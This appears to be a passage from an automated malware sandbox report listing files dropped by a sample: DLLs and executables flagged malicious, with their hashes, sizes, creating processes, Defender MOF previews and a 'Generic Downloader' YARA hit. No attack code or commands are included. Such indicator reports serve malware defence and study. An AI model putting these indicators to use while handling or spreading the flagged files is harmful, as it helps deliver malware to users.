                                                                            SHA1:3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
                                                                            SHA-256:5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
                                                                            SHA-512:B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):43520
                                                                            Entropy (8bit):3.4967857595832523
                                                                            Encrypted:false
                                                                            SSDEEP:384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
                                                                            MD5:FF86B38C73EED57883F04E1E61C3A213
                                                                            SHA1:6DD75F604393D70288AA1E28392AB83701B67650
                                                                            SHA-256:A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
                                                                            SHA-512:AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8704
                                                                            Entropy (8bit):3.57992330655092
                                                                            Encrypted:false
                                                                            SSDEEP:192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
                                                                            MD5:E38287B098C2A55EE69A224BE73C93E8
                                                                            SHA1:0422464BBDA490FBC74896494318B5A141CF2710
                                                                            SHA-256:B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
                                                                            SHA-512:9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7680
                                                                            Entropy (8bit):3.529446079422097
                                                                            Encrypted:false
                                                                            SSDEEP:96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
                                                                            MD5:D186BEDACDCCA084DA65C65D598EBCA8
                                                                            SHA1:3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
                                                                            SHA-256:363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
                                                                            SHA-512:4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):35840
                                                                            Entropy (8bit):3.534239180172005
                                                                            Encrypted:false
                                                                            SSDEEP:768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
                                                                            MD5:3C50201BA7B59C83412E463689D9798B
                                                                            SHA1:A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
                                                                            SHA-256:DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
                                                                            SHA-512:32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):95866
                                                                            Entropy (8bit):3.503699910346522
                                                                            Encrypted:false
                                                                            SSDEEP:768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
                                                                            MD5:675269F40380DCD00A2E2144A57F610A
                                                                            SHA1:B663129AD88776319E98519784CE2B21765AB196
                                                                            SHA-256:87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
                                                                            SHA-512:0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
                                                                            Malicious:false
                                                                             Preview:
                                                                             #pragma autorecover
                                                                             #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender")
                                                                             instance of __namespace{ name="MS_409";};
                                                                             #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_409")

                                                                             [Description("This is an abstract class that shows the base status.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_409")]
                                                                             class BaseStatus
                                                                             {
                                                                             };

                                                                             [Description("This is an abstract class that shows the base status.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_409")]
                                                                             class MSFT_MpComputerStatu
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):3.459513705694916
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
                                                                            MD5:AFE6664D26D5D05B4568E329BE37D7DE
                                                                            SHA1:2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
                                                                            SHA-256:B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
                                                                            SHA-512:8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
                                                                            Malicious:false
                                                                             Preview:
                                                                             #pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_409")

                                                                             #pragma deleteclass("MSFT_MpComputerStatus",nofail)
                                                                             #pragma deleteclass("MSFT_MpEvent",nofail)
                                                                             #pragma deleteclass("MSFT_MpHeartBeat",nofail)
                                                                             #pragma deleteclass("MSFT_MpPreference",nofail)
                                                                             #pragma deleteclass("MSFT_MpScan",nofail)
                                                                             #pragma deleteclass("MSFT_MpSignature",nofail)
                                                                             #pragma deleteclass("MSFT_MpThreat",nofail)
                                                                             #pragma deleteclass("MSFT_MpThreatCatalog",nofail)
                                                                             #pragma deleteclass("MSFT_MpThreatDetecti
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):3.3889790046988564
                                                                            Encrypted:false
                                                                            SSDEEP:48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
                                                                            MD5:C99D5885AAB799E23E6E5498D0D1B07C
                                                                            SHA1:33450BDC3CDA46CEC0AF5467826143C46624E597
                                                                            SHA-256:C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
                                                                            SHA-512:8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):685328
                                                                            Entropy (8bit):6.2613956335812
                                                                            Encrypted:false
                                                                            SSDEEP:12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
                                                                            MD5:113DB043FE13F4635D0A65FDF100CFD3
                                                                            SHA1:1DF847E5E1680669FE0DF779B66942C521B47012
                                                                            SHA-256:716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
                                                                            SHA-512:0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.99997781368023
                                                                            Encrypted:true
                                                                            SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6owng4gB6nho8V9TT:HeZ4N80jwG3W2xR2YP6Meg4gBf8H
                                                                            MD5:51B2093E0B5ED5E5222783D1E118F078
                                                                            SHA1:D698D261CA3B18EE7A6395D4BFF47E7A9D8CCE4D
                                                                            SHA-256:2E5BE87C36974215CAFF5C0C47F862F4DC346AAE3B241120E60BB93ECC5DED7A
                                                                            SHA-512:12542523189F108CE20785ADADE42DFAF59105B6A247AF82FE7F4DA783F457F762BFF9B67862AA258C29867F8E78591DBD05E53A796308199A314ADD5830DA08
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.9960409978876035
                                                                            Encrypted:true
                                                                            SSDEEP:196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDh+qil1n2vtfc/m5:6h5vD0JRTPux4ZLsZ7Ab
                                                                            MD5:62F22685BB0932A16A23312806F3C8EF
                                                                            SHA1:AE6FF7EC264721A964B0676E23E6154AAF37E760
                                                                            SHA-256:6E3F48F0746BB21BE252608750D848614465AA76C79A8EBB362907D3E4F527A7
                                                                            SHA-512:7915451CA40598E5639A3774ACEF8C87BD7A70123B7538543232B3F6D4770CACDEB1C555D80C68AB51F38A2DAE34EC4CE778AC7D3106A946A7EA33A8E447E37B
                                                                            Malicious:false
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):3.688226991598996
                                                                            Encrypted:false
                                                                            SSDEEP:24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
                                                                            MD5:66D970ACC9C33581B9E3152CDF46C707
                                                                            SHA1:7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
                                                                            SHA-256:36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
                                                                            SHA-512:C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):55808
                                                                            Entropy (8bit):3.370538627905652
                                                                            Encrypted:false
                                                                            SSDEEP:384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
                                                                            MD5:50C3A70FA84C07A424EC3D2834D06523
                                                                            SHA1:4FD26B0566F31172BAC62B839ED5CB62B6625AD5
                                                                            SHA-256:95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
                                                                            SHA-512:DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):47104
                                                                            Entropy (8bit):3.506031927133505
                                                                            Encrypted:false
                                                                            SSDEEP:384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
                                                                            MD5:CE84B2A9F6DF190FA977504B51536808
                                                                            SHA1:08EC7406B12042AD09EE7D3124863A57CE30F197
                                                                            SHA-256:A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
                                                                            SHA-512:5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8704
                                                                            Entropy (8bit):3.583197744926803
                                                                            Encrypted:false
                                                                            SSDEEP:192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
                                                                            MD5:5D46933E794A91BFDF12CDA3348BDE8B
                                                                            SHA1:F940EC0F7C8DC00F599D24020C6785D217C8B07F
                                                                            SHA-256:69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
                                                                            SHA-512:CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):3.658761008984688
                                                                            Encrypted:false
                                                                            SSDEEP:96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
                                                                            MD5:353FFC1C5EAF0A900FABCAAB968ED76E
                                                                            SHA1:ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
                                                                            SHA-256:36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
                                                                            SHA-512:A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):39936
                                                                            Entropy (8bit):3.5026787417351337
                                                                            Encrypted:false
                                                                            SSDEEP:384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
                                                                            MD5:6817F98F4E0D412F0313C417100B89A6
                                                                            SHA1:4B1D40AE23935F47BE28E45827404C008481BE5B
                                                                            SHA-256:BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
                                                                            SHA-512:07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):103370
                                                                            Entropy (8bit):3.5117432836886926
                                                                            Encrypted:false
                                                                            SSDEEP:1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
                                                                            MD5:EAC0C55B5DDE369B236E10E36FAFECA5
                                                                            SHA1:1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
                                                                            SHA-256:71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
                                                                            SHA-512:B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
                                                                            Malicious:false
                                                                            Preview:#pragma autorecover #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender") instance of __namespace{ name="MS_416";}; #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_416") [Description("Esta é uma classe abstrata que mostra o status base.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_416")] class BaseStatus { }; [Description("Esta é uma classe abstrata que mostra o status base.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_416")] class MSFT_MpComputerStatus
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):3.459513705694916
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
                                                                            MD5:606AA235BE1B21761E91A75475BB4CCA
                                                                            SHA1:437D21FC2BDD385A6540428B2B99D45191A38BB2
                                                                            SHA-256:9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
                                                                            SHA-512:3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
                                                                            Malicious:false
                                                                            Preview:#pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_416") #pragma deleteclass("MSFT_MpComputerStatus",nofail) #pragma deleteclass("MSFT_MpEvent",nofail) #pragma deleteclass("MSFT_MpHeartBeat",nofail) #pragma deleteclass("MSFT_MpPreference",nofail) #pragma deleteclass("MSFT_MpScan",nofail) #pragma deleteclass("MSFT_MpSignature",nofail) #pragma deleteclass("MSFT_MpThreat",nofail) #pragma deleteclass("MSFT_MpThreatCatalog",nofail) #pragma deleteclass("MSFT_MpThreatDetecti
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3584
                                                                            Entropy (8bit):3.7438394010156575
                                                                            Encrypted:false
                                                                            SSDEEP:48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
                                                                            MD5:3464E072F66FFE6CF4DF06CF9C11D331
                                                                            SHA1:197566FD1A73D5BE8D3A720A51DB02329C6DFC54
                                                                            SHA-256:EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
                                                                            SHA-512:1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
                                                                            Malicious:true
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):468312
                                                                            Entropy (8bit):5.621872137435956
                                                                            Encrypted:false
                                                                            SSDEEP:6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
                                                                            MD5:85E67579A416A86D726D4AEC49F0EF87
                                                                            SHA1:2D7D1C1213B09924F926D9C6197A60CC3F617B3C
                                                                            SHA-256:112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
                                                                            SHA-512:0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
                                                                            Malicious:true
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):0.363788168458258
                                                                            Encrypted:false
                                                                            SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                            MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                            SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                            SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                            SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                            Malicious:false
                                                                            Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):1.3107933906962441
                                                                            Encrypted:false
                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                                                                            MD5:E3EAE6AD1D9B832CC765A23DC73C743B
                                                                            SHA1:1056035EA8FA843542191914D942D783577FD818
                                                                            SHA-256:264D213B9A42A1ED9EB37C41FBBB05FAFB3EADA45BE1734E8EEB1BE39CA7AB91
                                                                            SHA-512:2B5E06CCF9B0DCB27387263DBF6AE5305E55956CB6896B9816A175132AAF0FD3107E66F8A27BCECED868E3D04D213EB8B60FE4AE0CDBFB2C051F5ED2AFC6AC89
                                                                            Malicious:false
                                                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf75d4465, page size 16384, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.4222019192565745
                                                                            Encrypted:false
                                                                            SSDEEP:1536:HSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Hazag03A2UrzJDO
                                                                            MD5:2499013D27F5239BF8D5980200CBFCE3
                                                                            SHA1:237C80377B64E007AF0B9D7B528F31316848C4A4
                                                                            SHA-256:662051BB362E23FC849CD651901A411E3C74A8E4ED16137061A4E1A43971C436
                                                                            SHA-512:1AB554070ECF11884C3597E4F869DA6C06CBEEAEF705ADC237DF481B58272C3ED23A3D7E5A1DDCB8CA665C0064E95997040191ED99975BE533CF52A946CE13D3
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.07805368356711997
                                                                            Encrypted:false
                                                                            SSDEEP:3:kVmXUetYeJUeWlllUpcEKlllaZAHpgElllallOE/tlnl+/rTc:tzJUbSBakZAukApMP
                                                                            MD5:72C8FE93D26D6ABB1EEF0346FAD00808
                                                                            SHA1:C6F0F49842E6FD098E9C4F4356BF096BED32390A
                                                                            SHA-256:A560EB2071442ED9B5138289985F67DBFF60BAB509C54C375C6FE9B3DF090BFC
                                                                            SHA-512:D180589EFD48D7B5128FCACCF600311DB89FEAB38E541CE9381781107E754A337E13F28E7C9608BB3F7F4BBD9A8197C0DD74F66D69306C82BDA07ACB1BCBBC39
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):195072
                                                                            Entropy (8bit):6.4531672862338665
                                                                            Encrypted:false
                                                                            SSDEEP:3072:SZzaqLh5m21b4n86fZHi8c62bdq32BsWtEGwF4JOAg0FuDTT6ETeMU:SZzvhs2Z4n1E7g34XtVYAOfTdpU
                                                                            MD5:8592377C52716F08DE428E2D519492A8
                                                                            SHA1:B262A95F384E0C52C5233E7D9BF222D98EC3B03D
                                                                            SHA-256:70A5A6ECA7B6C40D5B3B2D9D80B8524771540007514ADCC8C565B6FDFFA75AF0
                                                                            SHA-512:3A098656A443F70B1D63E18F5F813A2E2FD1558237BE7CBE2BC81FF42D8C8ED9325125D1A0E21DF9AFE9DD7C4343467449BF22E12542422DC45B8E58B78CA6B8
                                                                            Malicious:true
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1899520
                                                                            Entropy (8bit):5.894883178349122
                                                                            Encrypted:false
                                                                            SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                            MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                            SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                            SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                            SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Extra\Update.exe, Author: Joe Security
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):359424
                                                                            Entropy (8bit):7.8682236372661025
                                                                            Encrypted:false
                                                                            SSDEEP:6144:c2btXaOTpTmDulCmhL9J0l68iG99WGS7UMfCrc+l7qwXR60dJ4I7u8FMWzs3t:cqXacTaulCSRO6iWnAMqQ+l7qwXR5ud3
                                                                            MD5:A8AEC0D17F15C613DCCAD945FCF6F928
                                                                            SHA1:FD5BA9AD64AAD1DA3B272D9056991A0EA0C6BBF4
                                                                            SHA-256:9F74526AC2718F5BB1FAAF77E09F40DECA372433659FDC328962A3DFC68CEAC9
                                                                            SHA-512:0EC27A882D8F3EC002847B87DA8FDCE50E80AA6D14B852808CC43BE8222D18A468142D91EAF702AC9EDCEA3BF9318655063874E65C33742D76D9362B6327085B
                                                                            Malicious:true
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):28
                                                                            Entropy (8bit):4.182005814760213
                                                                            Encrypted:false
                                                                            SSDEEP:3:6jbYT:8ba
                                                                            MD5:2CB6C90CD8C364ACF10C947776B6EC27
                                                                            SHA1:FF04A8CF186D056F8071580A6197F7C00793CA21
                                                                            SHA-256:EF3A8B8FCD80C198CD846B85ED0E6C6536F3FB3AF7E89FFAAE153CCDC9703A50
                                                                            SHA-512:EB7D6E74BC901BF6A7BAC124C1C75CB31214700203A449CFB2AE13CFF8FB67CFDFECEC2F3BD1AAF046F0797BE1C8795F0E6E618E5F6589BF6484C3B053972C8C
                                                                            Malicious:false
                                                                            Preview:hykja412:Tower:diskres:Extra
                                                                            Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):29199008
                                                                            Entropy (8bit):7.999994459380155
                                                                            Encrypted:true
                                                                            SSDEEP:786432:y4Qt269TaEKww6K57xSukh8+CHwsotYrb:y4Ql9DKwoxNkEwsotYrb
                                                                            MD5:8886271A4B21844F93E092F3F413AC0B
                                                                            SHA1:F7899BB6D91F36C0FAA6CD45BFE5B2F84320CBF0
                                                                            SHA-256:8BBC026C9097E653A98C1F44F9435CDF1018DEBF3797A15AA19B0B2E3227A239
                                                                            SHA-512:41BD3A26830D359DEC7824095C63D6375321CE24351DCEB5DD43ED922918E40B7E44B5B859B1D8948A272385C24198419486D2CF0E17C7225EEAD3F6973B76A9
                                                                            Malicious:false
                                                                            Process:C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):29199006
                                                                            Entropy (8bit):0.9008661682526443
